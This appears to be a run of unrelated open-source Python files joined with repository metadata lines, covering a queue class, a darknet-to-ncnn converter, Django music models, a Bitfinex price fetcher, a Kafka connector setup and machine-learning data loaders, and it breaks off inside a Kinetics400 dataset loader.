self.assertEqual(d.tracks[2].disctitle, 'MEDIUM TITLE CD2')
self.assertEqual(len(d.tracks), 3)
def test_parse_minimal_release(self):
"""Test parsing of a release with the minimal amount of information."""
data = {'id': 123,
'tracklist': [self._make_track('A', '1', '01:01')],
'artists': [{'name': 'ARTIST NAME', 'id': 321, 'join': ''}],
'title': 'TITLE'}
release = Bag(data=data,
title=data['title'],
artists=[Bag(data=d) for d in data['artists']])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.artist, 'ARTIST NAME')
self.assertEqual(d.album, 'TITLE')
self.assertEqual(len(d.tracks), 1)
def test_parse_release_without_required_fields(self):
"""Test parsing of a release that does not have the required fields."""
release = Bag(data={}, refresh=lambda *args: None)
with capture_log() as logs:
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d, None)
self.assertIn('Release does not contain the required fields', logs[0])
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| 2.359375 | 2 |
data_structures/queue/queue_on_pseudo_stack.py | hank-chou/python | 13 | 1155 | <filename>data_structures/queue/queue_on_pseudo_stack.py
"""Queue represented by a pseudo stack (represented by a list with pop and append)"""
class Queue:
def __init__(self):
self.stack = []
self.length = 0
def __str__(self):
printed = "<" + str(self.stack)[1:-1] + ">"
return printed
"""Enqueues {@code item}
@param item
item to enqueue"""
def put(self, item):
self.stack.append(item)
self.length = self.length + 1
"""Dequeues {@code item}
@requirement: |self.length| > 0
@return dequeued
item that was dequeued"""
def get(self):
self.rotate(1)
dequeued = self.stack[self.length - 1]
self.stack = self.stack[:-1]
self.rotate(self.length - 1)
self.length = self.length - 1
return dequeued
"""Rotates the queue {@code rotation} times
@param rotation
number of times to rotate queue"""
def rotate(self, rotation):
for i in range(rotation):
temp = self.stack[0]
self.stack = self.stack[1:]
self.put(temp)
self.length = self.length - 1
"""Reports item at the front of self
@return item at front of self.stack"""
def front(self):
front = self.get()
self.put(front)
self.rotate(self.length - 1)
return front
"""Returns the length of this.stack"""
def size(self):
return self.length
| 4.1875 | 4 |
darknet2ncnn.py | nihui/gen-ncnn-models | 4 | 1156 | <reponame>nihui/gen-ncnn-models
#! /usr/bin/env python
# coding: utf-8
import configparser
import numpy as np
import re,sys,os
from graph import MyGraph
from collections import OrderedDict
def unique_config_sections(config_file):
"""Convert all config sections to have unique names.
Adds unique suffixes to config sections for compability with configparser.
"""
from collections import defaultdict
import io
section_counters = defaultdict(int)
output_stream = io.StringIO()
with open(config_file) as fin:
for line in fin:
if line.startswith('['):
section = line.strip().strip('[]')
_section = section + '_' + str(section_counters[section])
section_counters[section] += 1
line = line.replace(section, _section)
output_stream.write(line)
output_stream.seek(0)
return output_stream
def getFilters(mydict, name):
#print('find filters for ', name)
if hasattr(mydict[name], 'filters'):
return mydict[name].filters
else:
assert len(mydict[name].input) >= 1
return getFilters(mydict, mydict[name].input[0])
def readfile(f, len, msg):
print(" %s read %d bytes" % (msg, len))
return f.read(len)
def buildGraph(config_path, weights_path):
unique_config_file = unique_config_sections(config_path)
cfg_parser = configparser.ConfigParser()
cfg_parser.read_file(unique_config_file)
weights_file = open(weights_path, 'rb')
# read out major, minor, revision, net.seen
readfile(weights_file, (4*4), 'head')
mydict = OrderedDict()
# record the output of the original layer
mylist = []
count = 4
import queue
for _section in cfg_parser.sections():
sec_q = queue.Queue(0)
sec_q.put(cfg_parser[_section])
while not sec_q.empty():
sec = sec_q.get()
section = sec.name
print('Parsing section {}'.format(section))
# this section will can be a subsection
if section.startswith('activation') or section.endswith('activation'):
activation = sec.get('activation', fallback = 'logistic')
if activation == 'linear':
pass
elif activation == 'linear' or activation == 'leaky' or activation == 'relu':
node = MyGraph.MyNode()
node.name = section
node.op = 'Leaky'
if activation == 'linear':
node.slope = 1
elif activation == 'leaky':
node.slope = 0.1
elif activation == 'relu':
node.slope = 0
node.input = [prev_output]
node.input_norm = node.input
#node.attr = []
mydict[node.name] = node
prev_output = node.name
# prev_layer_filters no change
else:
raise ValueError(
'Unknown activation function `{}` in section {}'.format(
activation, section))
if section.startswith('activation'):
mylist.append(section)
elif re.match(r'^(convolutional|depthwise|groupwise)_\d+$', section):
if section.startswith('convolutional'):
conv = 'conv'
filters = sec.getint('filters', fallback = 1)
groups = 1
op = 'Conv2D'
elif section.startswith('depthwise'):
conv = 'dconv'
filters = prev_layer_filters
multiplier = sec.getint('multiplier', fallback = 1)
assert multiplier == 1
groups = filters
op = 'DepthwiseConv2dNative'
elif section.startswith('groupwise'):
conv = 'gconv'
filters = sec.getint('filters', fallback=1)
groups = sec.getint('groups', fallback = 1)
op = 'DepthwiseConv2dNative'
size = sec.getint('size', fallback = 1)
stride = sec.getint('stride', fallback = 1)
pad = sec.getint('pad', fallback = 0)
padding = sec.getint('padding', fallback = 0)
activation = sec.get('activation', fallback = 'logistic')
batch_normalize = sec.getint('batch_normalize', 0)
# padding='same' is equivalent to Darknet pad=1
# padding = 'same' if pad == 1 else 'valid'
if pad:
padding = size//2
# Setting weights.
# Darknet serializes convolutional weights as:
# [bias/beta, [gamma, mean, variance], conv_weights]
#prev_layer_shape = prev_layer.shape
# TODO: This assumes channel last dim_ordering.
if conv == 'conv':
weights_shape = (size, size, prev_layer_filters, filters)
idx_tf2darknet = [0, 1, 2, 3]
elif conv == 'dconv':
weights_shape = (size, size, filters)
idx_tf2darknet = [0, 1, 2]
elif conv == 'gconv':
weights_shape = (size, size, prev_layer_filters//groups, filters//groups, groups)
idx_tf2darknet = [0, 1, 2, 3, 4]
idxmap = {x: i for i, x in enumerate(idx_tf2darknet)}
idx_dartnet2tf = [idxmap[i] for i in range(len(idxmap))]
weights_size = np.product(weights_shape)
print(' ' + conv, 'bn' if batch_normalize else ' ', activation, weights_shape)
conv_bias = np.ndarray(
shape=(filters, ),
dtype=np.float32,
buffer=readfile(weights_file, (filters * 4), section+'-bias'))
count += filters
if batch_normalize:
bn_weights = np.ndarray(
shape=(3, filters),
dtype=np.float32,
buffer=readfile(weights_file, (filters * 12), section+'-batchnorm'))
count += 3 * filters
# TODO: Keras BatchNormalization mistakenly refers to var
# as std.
bn_weight_list = [
bn_weights[0], # scale gamma
conv_bias, # shift beta
bn_weights[1], # running mean
bn_weights[2] # running var
]
conv_weights = np.ndarray(
shape=[weights_shape[i] for i in idx_tf2darknet],
dtype=np.float32,
buffer=readfile(weights_file, (weights_size * 4), section+'-weights'))
count += weights_size
# DarkNet conv_weights are serialized Caffe-style:
# (out_dim, in_dim, height, width)
# We would like to set these to Tensorflow order:
# (height, width, in_dim, out_dim)
# TODO: Add check for Theano dim ordering.
#print("the darknet shape is ", conv_weights.shape)
conv_weights = np.transpose(conv_weights, idx_dartnet2tf)
#print("the tf shape is ", conv_weights.shape)
conv_weights = [conv_weights] if batch_normalize else [
conv_weights, conv_bias
]
# Create nodes
#conv_layer = np.zeros([1, 1, filters], dtype = np.float32)
node = MyGraph.MyNode()
node.name = section
node.op = op
node.input = [prev_output]
node.input_norm = node.input
node.kernel = conv_weights[0]
node.padding = padding
node.strides = [1,stride,stride,1]
node.groups = groups
node.filters = filters
mydict[node.name] = node
prev_output = node.name
prev_layer_filters = filters
if batch_normalize:
node = MyGraph.MyNode()
node.name = section + '_batch_normalize'
node.op = 'FusedBatchNorm'
node.input = [prev_output]
node.input_norm = node.input
#node.attr = []
node.gamma = bn_weights[0]
node.beta = conv_bias
node.mean = bn_weights[1]
node.variance = bn_weights[2]
mydict[node.name] = node
prev_output = node.name
# prev_layer_filters no change
else:
node = MyGraph.MyNode()
node.name = section + '_bias'
node.op = 'BiasAdd'
node.input = [prev_output]
node.input_norm = node.input
#node.attr = []
node.bias = conv_bias
mydict[node.name] = node
prev_output = node.name
if activation == 'linear':
mylist.append(prev_output)
else:
tmp_parser = configparser.ConfigParser()
name = section + '_activation'
tmp_parser.add_section(name)
tmp_parser.set(name, 'activation', activation)
sec_q.put(tmp_parser[name])
mylist.append(name)
elif section.startswith('shuffle'):
node = MyGraph.MyNode()
node.name = section
node.op = 'Shuffle'
node.input = [prev_output]
node.input_norm = node.input
node.groups = int(cfg_parser[section]['groups'])
mydict[node.name] = node
prev_output = node.name
mylist.append(section)
elif re.match(r'^(pooling|maxpool|avgpool)_\d+$', section):
node = MyGraph.MyNode()
node.stride = sec.getint('stride', fallback = 1)
node.size = sec.getint('size', node.stride)
node.padding = sec.getint('padding', fallback = (node.size-1)//2)
if section.startswith('pooling'):
node.mode = str(cfg_parser[section]['mode'])
node.global_pooling = 0
elif section.startswith('maxpool'):
node.mode = 'max'
node.global_pooling = 0
elif section.startswith('avgpool'):
node.mode = 'avg'
node.global_pooling = 1
node.name = section
node.op = 'Pooling'
node.input = [prev_output]
node.input_norm = node.input
mydict[node.name] = node
prev_output = node.name
#print('pooling ', vars(node))
mylist.append(section)
elif section.startswith('route'):
ids = [int(i) for i in cfg_parser[section]['layers'].split(',')]
node = MyGraph.MyNode()
node.name = section
node.op = 'NCNNConcat'
node.input = [mylist[i] for i in ids]
#print('mylist is ', mylist, 'the ids is ', ids, 'node input is ', node.input)
node.input_norm = node.input
node.axis = 0
node.filters = sum([getFilters(mydict, mylist[i]) for i in ids])
mydict[node.name] = node
prev_output = node.name
mylist.append(section)
prev_layer_filters = node.filters
elif section.startswith('reorg'):
node = MyGraph.MyNode()
node.name = section
node.op = 'DarknetReorg'
node.input = [prev_output]
node.stride = sec.getint('stride', fallback = 1)
node.input_norm = node.input
node.filters = getFilters(mydict, node.input[0]) * node.stride * node.stride
mydict[node.name] = node
prev_output = node.name
mylist.append(section)
prev_layer_filters = node.filters
elif re.match(r'^(shortcut)_\d+$', section):
activation = sec.get('activation', fallback = 'logistic')
from_ = sec.getint('from')
node = MyGraph.MyNode()
node.name = section
node.op = 'BinaryOp'
node.op_type = 0
node.input = [prev_output, mylist[from_]]
#print('mylist is ', mylist, 'the from_ is ', from_, 'node input is ', node.input)
node.input_norm = node.input
mydict[node.name] = node
prev_output = node.name
if activation == 'linear':
mylist.append(prev_output)
else:
tmp_parser = configparser.ConfigParser()
name = section + '_activation'
tmp_parser.add_section(name)
tmp_parser.set(name, 'activation', activation)
sec_q.put(tmp_parser[name])
# NOTE: this section has relative reference
mylist.append(name)
elif section.startswith('connected'):
activation = sec.get('activation', fallback='linear')
filters = sec.getint('output', 2)
bias_data = np.ndarray(
shape=[filters],
dtype=np.float32,
buffer=readfile(weights_file, (filters * 4), section+'-bias'))
fc_data = np.ndarray(
shape=[prev_layer_filters, filters],
dtype=np.float32,
buffer=readfile(weights_file, (prev_layer_filters * filters * 4), section+'-weight'))
node = MyGraph.MyNode()
node.name = section
node.op = 'MatMul'
node.input = [prev_output]
node.input_norm = node.input
node.multiplier = fc_data
mydict[node.name] = node
prev_output = node.name
prev_layer_filters = filters
node = MyGraph.MyNode()
node.name = section + '_bias'
node.op = 'BiasAdd'
node.input = [prev_output]
node.input_norm = node.input
# node.attr = []
node.bias = bias_data
mydict[node.name] = node
prev_output = node.name
if activation == 'linear':
mylist.append(prev_output)
else:
tmp_parser = configparser.ConfigParser()
name = section + '_activation'
tmp_parser.add_section(name)
tmp_parser.set(name, 'activation', activation)
sec_q.put(tmp_parser[name])
mylist.append(name)
elif section.startswith('net'):
node = MyGraph.MyNode()
node.name = section
node.op = 'DarknetNet'
node.input = []
node.input_norm = []
node.width = int(cfg_parser['net_0']['width'])
node.height = int(cfg_parser['net_0']['height'])
node.channels = int(cfg_parser['net_0']['channels'])
node.filters = node.channels
# print(vars(node))
# node.attr = []
mydict[node.name] = node
# start here
prev_output = node.name
prev_layer_filters = node.channels
mylist.append(section)
elif section.startswith('region'):
node = MyGraph.MyNode()
node.name = section
node.op = 'DarknetRegion'
node.input = [prev_output]
node.input_norm = node.input
node.classes = int(cfg_parser[section]['classes'])
node.num = int(cfg_parser[section]['num'])
node.softmax = int(cfg_parser[section]['softmax'])
node.anchors = [float(i) for i in re.split(r',', cfg_parser[section]['anchors'])]
#print(vars(node))
#node.attr = []
mydict[node.name] = node
prev_output = node.name
mylist.append(section)
elif section.startswith('softmax'):
node = MyGraph.MyNode()
node.name = section
node.op = 'Softmax'
node.input = [prev_output]
node.input_norm = node.input
mydict[node.name] = node
prev_output = node.name
mylist.append(section)
pass
elif section.startswith('cost'):
pass # Configs not currently handled during model definition.
else:
raise ValueError(
'Unsupported section header type: {}'.format(section))
print(' out filters ', prev_layer_filters)
print('loaded {} bytes in weights file'.format(count*4))
mygraph = MyGraph(mydict)
mygraph.type = 'darknet'
return mygraph
if __name__ == '__main__':
config_path = sys.argv[1]
weights_path = sys.argv[2]
mygraph = buildGraph(config_path, weights_path)
# 定义子图所需要的输出节点,输入节点,终止节点
outputNodes = ['region_0', 'softmax_0']
stopNodes = []
inputNodes = ['darknet_0']
mygraph.extractSubGraph(inputNodes, outputNodes, stopNodes)
mygraph.generateDot('YoloV2.dot')
# 生成子图对应的代码
mygraph.generateSource('YoloV2', os.path.split(config_path)[1]+'.ncnn', os.path.split(weights_path)[1] + '.ncnn')
| 2.453125 | 2 |
music/models.py | anirudha-bs/Django_music_app | 0 | 1157 | from django.contrib.auth.models import Permission, User
from django.db import models
class Album(models.Model):
user = models.ForeignKey(User, default=1,on_delete=models.CASCADE)
artist = models.CharField(max_length=250)
album_title = models.CharField(max_length=500)
genre = models.CharField(max_length=100)
album_logo = models.FileField(default="avatar.jpg")
album_visibility = models.CharField(max_length=100, default="private")
is_favorite = models.BooleanField(default=False)
def __str__(self):
return self.album_title + '-' + self.artist + '-' + self.genre
class Song(models.Model):
user = models.ForeignKey(User, default=1,on_delete=models.CASCADE)
album = models.ForeignKey(Album, on_delete=models.CASCADE, null=True)
song_title = models.CharField(max_length=250)
audio_file = models.FileField(default='')
song_visibility = models.CharField(max_length=100, default="private")
is_favorite = models.BooleanField(default=False)
def __str__(self):
return self.song_title | 2.515625 | 3 |
finex_history.py | yihming/gdax-data | 0 | 1158 | <filename>finex_history.py
import datetime
import calendar
import requests
import pandas as pd
import json
import os.path
import time
import MySQLdb as M
from gdax_history import timestamp_to_utcstr
def connect_to_db():
config = json.load(open('dbconn.json'))["mysql"]
db = M.connect(host = config["host"],
user = config["user"],
passwd = config["password"],
db = config["database"])
return db
def write_to_db(df, db):
print "Write %d entries to database." % df.shape[0]
cur = db.cursor()
try:
for row in df.itertuples():
ts = row.Time / 1000
cur.execute(
"""INSERT INTO finex_history (timestamp, open, close, high, low, volume, utc_datetime)
VALUES (%s, %s, %s, %s, %s, %s, %s)""",
[ts, row.Open, row.Close, row.High, row.Low, row.Volume, timestamp_to_utcstr(ts)])
db.commit()
print "Write successfully!\n"
except (M.Error, M.Warning) as e:
print e
db.rollback()
def collect_data(start, end):
starttime = datetime.datetime.strptime(start, '%m/%d/%Y')
endtime = datetime.datetime.strptime(end, '%m/%d/%Y')
start_unixtime = calendar.timegm(starttime.utctimetuple())
end_unixtime = calendar.timegm(endtime.utctimetuple())
track_time = time.time() #because bitstamp only allows 10 requests per minute. Take rest if we are faster than that
count = 0
df = pd.DataFrame(data = [], columns = ['Time', 'Open', 'Close', 'High', 'Low', 'Volume'])
while (start_unixtime < end_unixtime):
cur_end_unixtime = start_unixtime + 60 * 999 #60*60*24*30 #30 days at a time
if (cur_end_unixtime > end_unixtime):
cur_end_unixtime = end_unixtime #if the time is in future.
url = 'https://api.bitfinex.com/v2/candles/trade:1m:tBTCUSD/hist?start={}&end={}&limit=1000'.format(str(start_unixtime) + "000", str(cur_end_unixtime) + "000") #1 hour can be changed to any timeframe
response = requests.get(url)
data = response.json()
df_tmp = pd.DataFrame(data)
df_tmp.columns = ['Time', 'Open', 'Close', 'High', 'Low', 'Volume']
#df.set_index('Time')
df = pd.concat([df, df_tmp])
start_unixtime = cur_end_unixtime + 60 #to prevent duplicates
count = count + 1
if (count == 10): #if 10 requests are made
count = 0 #reset it
diff = time.time() - track_time
if (diff <= 60):
print('Sleeping for {} seconds'.format(str(60 - diff)))
time.sleep(60 - diff) #sleep
track_time = time.time()
#bitstamp limits to 10 requests per minute
df = df.sort_values(by = ['Time'])
return df
def main():
db = connect_to_db()
df = collect_data(start = '09/24/2018', end = '09/26/2018')
write_to_db(df, db)
db.close()
if __name__ == "__main__":
main()
| 2.578125 | 3 |
src/producers/connector.py | cvelas31/public_transportation_streaming | 0 | 1159 | """Configures a Kafka Connector for Postgres Station data"""
import json
import logging
import requests
from settings import Settings
logger = logging.getLogger(__name__)
KAFKA_CONNECT_URL = f"{Settings.URLs.KAFKA_CONNECT_URL}/connectors"
CONNECTOR_NAME = "stations"
def configure_connector():
"""Starts and configures the Kafka Connect connector"""
logging.debug("Creating or updating kafka connect connector...")
resp = requests.get(f"{KAFKA_CONNECT_URL}/{CONNECTOR_NAME}")
if resp.status_code == 200:
logging.debug("Connector already created skipping recreation")
return
config = {
"connector.class": "io.confluent.connect.jdbc.JdbcSourceConnector",
"key.converter": "org.apache.kafka.connect.json.JsonConverter",
"key.converter.schemas.enable": "false",
"value.converter": "org.apache.kafka.connect.json.JsonConverter",
"value.converter.schemas.enable": "false",
"topic.prefix": "com.connect.transportation.",
"connection.url": "jdbc:postgresql://postgres:5432/cta",
"connection.user": "cta_admin",
"connection.password": "<PASSWORD>",
"batch.max.rows": "500",
"table.whitelist": "stations",
"poll.interval.ms": "5000", # Poll every 5 seconds
"mode": "incrementing",
"incrementing.column.name": "stop_id",
}
# TODO: Complete the Kafka Connect Config below.
# Directions: Use the JDBC Source Connector to connect to Postgres. Load the `stations` table
# using incrementing mode, with `stop_id` as the incrementing column name.
# Make sure to think about what an appropriate topic prefix would be, and how frequently Kafka
# Connect should run this connector (hint: not very often!)
data = json.dumps({"name": CONNECTOR_NAME, "config": config})
resp = requests.post(
KAFKA_CONNECT_URL,
headers={"Content-Type": "application/json"},
data=data,
)
# Ensure a healthy response was given
resp.raise_for_status()
logging.info("-------Connector created successfully-------")
if __name__ == "__main__":
configure_connector()
| 3.109375 | 3 |
liuetal2019/utils.py | wasiahmad/GATE | 24 | 1160 | import io
import logging
import json
import numpy
import torch
import numpy as np
from tqdm import tqdm
from clie.inputters import constant
from clie.objects import Sentence
from torch.utils.data import Dataset
from torch.utils.data.sampler import Sampler
logger = logging.getLogger(__name__)
def load_word_embeddings(file):
embeddings_index = {}
fin = io.open(file, 'r', encoding='utf-8', newline='\n', errors='ignore')
n, d = map(int, fin.readline().split())
for i, line in tqdm(enumerate(fin), total=n):
tokens = line.rstrip().split(' ')
v = numpy.array(tokens[1:], dtype=float)
embeddings_index[tokens[0]] = v
return embeddings_index
# ------------------------------------------------------------------------------
# Data loading
# ------------------------------------------------------------------------------
def load_data(filename, src_lang, tgt_lang, knn_file,
knn_size, max_examples=-1):
examples = []
wrong_subj_pos, wrong_obj_pos = 0, 0
with open(filename) as f:
data = json.load(f)
knn_dict = None
if knn_file:
with open(knn_file) as f:
knn_dict = json.load(f)
for idx, ex in enumerate(tqdm(data, total=len(data))):
sentence = Sentence(ex['id'])
sentence.language = src_lang
sentence.words = ex['token']
sentence.pos = ex['stanford_pos']
sentence.ner = ex['stanford_ner']
sentence.deprel = ex['stanford_deprel']
sentence.head = [int(x) for x in ex['stanford_head']]
sentence.subj_type = ex['subj_type']
sentence.obj_type = ex['obj_type']
sentence.relation = ex['relation']
if ex['subj_end'] - ex['subj_start'] < 0:
# we swap the start and end index
wrong_subj_pos += 1
sentence.subject = [ex['subj_end'], ex['subj_start']]
else:
sentence.subject = [ex['subj_start'], ex['subj_end']]
if ex['obj_end'] - ex['obj_start'] < 0:
# we swap the start and end index
wrong_obj_pos += 1
sentence.object = [ex['obj_end'], ex['obj_start']]
else:
sentence.object = [ex['obj_start'], ex['obj_end']]
# store KNN word info
if knn_dict:
sentence.tgt_lang = tgt_lang
knn_words = []
for w in ex['token']:
w = '!{}_{}'.format(src_lang, w)
if w in knn_dict:
assert len(knn_dict[w]) == knn_size
knn_words.append(knn_dict[w])
else:
knn_words.append([constant.UNK_WORD] * knn_size)
sentence.knn_words = knn_words
examples.append(sentence)
if max_examples != -1 and len(examples) > max_examples:
break
if wrong_subj_pos > 0 or wrong_obj_pos > 0:
logger.info('{} and {} wrong subject and object positions found!'.format(
wrong_subj_pos, wrong_obj_pos))
return examples
def vectorize(ex, model, iseval):
"""Torchify a single example."""
words = ['!{}_{}'.format(ex.language, w) for w in ex.words]
words = [model.word_dict[w] for w in words]
knn_word = None
if ex.knn_words:
knn_word = [[model.word_dict[w] for w in knn]
for knn in ex.knn_words]
knn_word = torch.LongTensor(knn_word)
word = torch.LongTensor(words)
pos = torch.LongTensor([model.pos_dict[p] for p in ex.pos])
ner = torch.LongTensor([model.ner_dict[n] for n in ex.ner])
deprel = torch.LongTensor([model.deprel_dict[d] for d in ex.deprel])
assert any([x == 0 for x in ex.head])
head = torch.LongTensor(ex.head)
subj_position = torch.LongTensor(ex.subj_position)
obj_position = torch.LongTensor(ex.obj_position)
type = [0] * len(ex.words)
ttype = model.type_dict[ex.subj_type]
start, end = ex.subject
type[start: end + 1] = [ttype] * (end - start + 1)
atype = model.type_dict[ex.obj_type]
start, end = ex.object
type[start: end + 1] = [atype] * (end - start + 1)
type = torch.LongTensor(type)
return {
'id': ex.id,
'language': ex.language,
'word': word,
'pos': pos,
'ner': ner,
'deprel': deprel,
'type': type,
'head': head,
'subject': ex.subj_text,
'object': ex.obj_text,
'subject_pos': subj_position,
'object_pos': obj_position,
'relation': model.label_dict[ex.relation],
'knn_word': knn_word
}
def batchify(batch):
"""Gather a batch of individual examples into one batch."""
# batch is a list of vectorized examples
batch_size = len(batch)
ids = [ex['id'] for ex in batch]
language = [ex['language'] for ex in batch]
use_knn = batch[0]['knn_word'] is not None
# NOTE. batch[0]['knn_word'] is a 2d list
knn_size = len(batch[0]['knn_word'][0]) if use_knn else 0
# --------- Prepare Code tensors ---------
max_len = max([ex['word'].size(0) for ex in batch])
# Batch Code Representations
len_rep = torch.LongTensor(batch_size).fill_(constant.PAD)
word_rep = torch.LongTensor(batch_size, max_len).fill_(constant.PAD)
head_rep = torch.LongTensor(batch_size, max_len).fill_(constant.PAD)
subject_pos_rep = torch.LongTensor(batch_size, max_len).fill_(constant.PAD)
object_pos_rep = torch.LongTensor(batch_size, max_len).fill_(constant.PAD)
pos_rep = torch.LongTensor(batch_size, max_len).fill_(constant.PAD)
ner_rep = torch.LongTensor(batch_size, max_len).fill_(constant.PAD)
deprel_rep = torch.LongTensor(batch_size, max_len).fill_(constant.PAD)
type_rep = torch.LongTensor(batch_size, max_len).fill_(constant.PAD)
labels = torch.LongTensor(batch_size)
subject = []
object = []
knn_rep = None
if use_knn:
knn_rep = torch.LongTensor(batch_size, max_len, knn_size).fill_(constant.PAD)
for i, ex in enumerate(batch):
len_rep[i] = ex['word'].size(0)
labels[i] = ex['relation']
word_rep[i, :len_rep[i]] = ex['word']
head_rep[i, :len_rep[i]] = ex['head']
subject_pos_rep[i, :len_rep[i]] = ex['subject_pos']
object_pos_rep[i, :len_rep[i]] = ex['object_pos']
pos_rep[i, :len_rep[i]] = ex['pos']
ner_rep[i, :len_rep[i]] = ex['ner']
deprel_rep[i, :len_rep[i]] = ex['deprel']
type_rep[i, :len_rep[i]] = ex['type']
subject.append(ex['subject'])
object.append(ex['object'])
if use_knn:
knn_rep[i, :len_rep[i]] = ex['knn_word']
return {
'ids': ids,
'language': language,
'batch_size': batch_size,
'len_rep': len_rep,
'word_rep': word_rep,
'knn_rep': knn_rep,
'head_rep': head_rep,
'subject': subject,
'object': object,
'subject_pos_rep': subject_pos_rep,
'object_pos_rep': object_pos_rep,
'labels': labels,
'pos_rep': pos_rep,
'ner_rep': ner_rep,
'deprel_rep': deprel_rep,
'type_rep': type_rep
}
class ACE05Dataset(Dataset):
def __init__(self, examples, model, evaluation=False):
self.model = model
self.examples = examples
self.evaluation = evaluation
def __len__(self):
return len(self.examples)
def __getitem__(self, index):
return vectorize(self.examples[index], self.model,
iseval=self.evaluation)
def lengths(self):
return [len(ex.words) for ex in self.examples]
class SortedBatchSampler(Sampler):
def __init__(self, lengths, batch_size, shuffle=True):
self.lengths = lengths
self.batch_size = batch_size
self.shuffle = shuffle
def __iter__(self):
lengths = np.array(
[(-l, np.random.random()) for l in self.lengths],
dtype=[('l1', np.int_), ('rand', np.float_)]
)
indices = np.argsort(lengths, order=('l1', 'rand'))
batches = [indices[i:i + self.batch_size]
for i in range(0, len(indices), self.batch_size)]
if self.shuffle:
np.random.shuffle(batches)
return iter([i for batch in batches for i in batch])
def __len__(self):
return len(self.lengths)
| 2.3125 | 2 |
build.py | dnanexus/IndexTools | 15 | 1161 | from distutils.extension import Extension
cmdclass = {}
try:
# with Cython
from Cython.Build import build_ext
cmdclass["build_ext"] = build_ext
module_src = "cgranges/python/cgranges.pyx"
except ImportError: # without Cython
module_src = "cgranges/python/cgranges.c"
def build(setup_kwargs):
"""
This function is mandatory in order to build the extensions.
"""
setup_kwargs.update(
{
"ext_modules": [
Extension(
"cgranges",
sources=[module_src, "cgranges/cgranges.c"],
depends=[
"cgranges/cgranges.h",
"cgranges/khash.h",
"cgranges/python/cgranges.pyx"
],
include_dirs=["cgranges"]
)
],
"cmdclass": cmdclass
}
)
| 1.976563 | 2 |
icarus/models/service/__init__.py | oascigil/icarus_edge_comp | 5 | 1162 | <filename>icarus/models/service/__init__.py<gh_stars>1-10
# -*- coding: utf-8 -*-
from .compSpot import *
| 1.023438 | 1 |
gluoncv/data/kinetics400/classification.py | YvetteGuo/gluon-cv | 1 | 1163 | <reponame>YvetteGuo/gluon-cv<filename>gluoncv/data/kinetics400/classification.py
# pylint: disable=line-too-long,too-many-lines,missing-docstring
"""Kinetics400 action classification dataset."""
import os
import random
import numpy as np
from mxnet import nd
from mxnet.gluon.data import dataset
__all__ = ['Kinetics400']
class Kinetics400(dataset.Dataset):
"""Load the Kinetics400 action recognition dataset.
Refer to :doc:`../build/examples_datasets/kinetics400` for the description of
this dataset and how to prepare it.
Parameters
----------
root : str, default '~/.mxnet/datasets/kinetics400'
Path to the folder stored the dataset.
setting : str, required
Config file of the prepared dataset.
train : bool, default True
Whether to load the training or validation set.
test_mode : bool, default False
Whether to perform evaluation on the test set
name_pattern : str, default None
The naming pattern of the decoded video frames.
For example, img_00012.jpg
is_color : bool, default True
Whether the loaded image is color or grayscale
modality : str, default 'rgb'
Input modalities, we support only rgb video frames for now.
Will add support for rgb difference image and optical flow image later.
num_segments : int, default 1
Number of segments to evenly divide the video into clips.
A useful technique to obtain global video-level information.
<NAME>, etal, Temporal Segment Networks: Towards Good Practices for Deep Action Recognition, ECCV 2016
new_length : int, default 1
The length of input video clip. Default is a single image, but it can be multiple video frames.
For example, new_length=16 means we will extract a video clip of consecutive 16 frames.
new_width : int, default 340
Scale the width of loaded image to 'new_width' for later multiscale cropping and resizing.
new_height : int, default 256
Scale the height of loaded image to 'new_height' for later multiscale cropping and resizing.
target_width : int, default 224
Scale the width of transformed image to the same 'target_width' for batch forwarding.
target_height : int, default 224
Scale the height of transformed image to the same 'target_height' for batch forwarding.
transform : function, default None
A function that takes data and label and transforms them.
"""
def __init__(self,
setting=os.path.expanduser('~/.mxnet/datasets/kinetics400/kinetics400_train_list_rawframes.txt'),
root=os.path.expanduser('~/.mxnet/datasets/kinetics400/rawframes_train'),
train=True,
test_mode=False,
name_pattern=None,
is_color=True,
modality='rgb',
num_segments=1,
new_length=1,
new_width=340,
new_height=256,
target_width=224,
target_height=224,
transform=None):
super(Kinetics400, self).__init__()
self.root = root
self.setting = setting
self.train = train
self.test_mode = test_mode
self.is_color = is_color
self.modality = modality
self.num_segments = num_segments
self.new_height = new_height
self.new_width = new_width
self.target_height = target_height
self.target_width = target_width
self.new_length = new_length
self.transform = transform
self.classes, self.class_to_idx = self._find_classes(root)
self.clips = self._make_dataset(root, setting)
if len(self.clips) == 0:
raise(RuntimeError("Found 0 video clips in subfolders of: " + root + "\n"
"Check your data directory (opt.data-dir)."))
if name_pattern:
self.name_pattern = name_pattern
else:
if self.modality == "rgb":
self.name_pattern = "img_%05d.jpg"
elif self.modality == "flow":
self.name_pattern = "flow_%s_%05d.jpg"
def __getitem__(self, index):
directory, duration, target = self.clips[index]
average_duration = int(duration / self.num_segments)
offsets = []
for seg_id in range(self.num_segments):
if self.train and not self.test_mode:
# training
if average_duration >= self.new_length:
offset = random.randint(0, average_duration - self.new_length)
# No +1 because randint(a,b) return a random integer N such that a <= N <= b.
offsets.append(offset + seg_id * average_duration)
else:
offsets.append(0)
elif not self.train and not self.test_mode:
# validation
if average_duration >= self.new_length:
offsets.append(int((average_duration - self.new_length + 1)/2 + seg_id * average_duration))
else:
offsets.append(0)
else:
# test
if average_duration >= self.new_length:
offsets.append(int((average_duration - self.new_length + 1)/2 + seg_id * average_duration))
else:
offsets.append(0)
clip_input = self._TSN_RGB(directory, offsets, self.new_height, self.new_width, self.new_length, self.is_color, self.name_pattern)
if self.transform is not None:
clip_input = self.transform(clip_input)
if self.num_segments > 1 and not self.test_mode:
# For TSN training, reshape the input to B x 3 x H x W. Here, B = batch_size * num_segments
clip_input = clip_input.reshape((-1, 3 * self.new_length, self.target_height, self.target_width))
return clip_input, target
def __len__(self):
return len(self.clips)
def _find_classes(self, directory):
classes = [d for d in os.listdir(directory) if os.path.isdir(os.path.join(directory, d))]
classes.sort()
class_to_idx = {classes[i]: i for i in range(len(classes))}
return classes, class_to_idx
def _make_dataset(self, directory, setting):
if not os.path.exists(setting):
raise(RuntimeError("Setting file %s doesn't exist. Check opt.train-list and opt.val-list. " % (setting)))
clips = []
with open(setting) as split_f:
data = split_f.readlines()
for line in data:
line_info = line.split()
# line format: video_path, video_duration, video_label
if len(line_info) < 3:
print('Video input format is not correct, missing one or more element. %s' % line)
continue
